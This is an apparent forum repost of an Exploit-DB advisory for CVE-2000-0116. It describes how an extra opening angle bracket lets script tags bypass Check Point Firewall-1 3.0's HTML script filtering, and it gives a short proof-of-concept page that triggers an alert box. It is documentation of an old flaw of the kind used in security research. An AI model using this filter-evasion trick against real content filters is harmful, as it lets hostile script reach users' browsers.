Exploit Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19732
Проверка EDB
  1. Пройдено
Автор
ARNE VIDSTROM
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2000-0116
Дата публикации
2000-01-29
Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass
HTML:
source: https://www.securityfocus.com/bid/954/info

Firewall-1 includes the ability to alter script tags in HTML pages before passing them to the client's browser. This alteration invalidates the tag, rendering the script unexecutable by the browser. In version 3, this function can be bypassed by adding an extra opening angle bracket. The tag will be left unmodified, and the browser will be able to execute the contained script. Hostile script could lead to a remote compromise of the client system.

Firewall-1 version 4 will alter the tag as expected. 

<html>
<<script language="javascript">
alert("<<script> tag succesfully passed!")
</script>
Click <A HREF="/vdb/bottom.html?section=exploit&vid=954">here</A> to return to vulnerability listing.
</html>
 
Источник
www.exploit-db.com

Похожие темы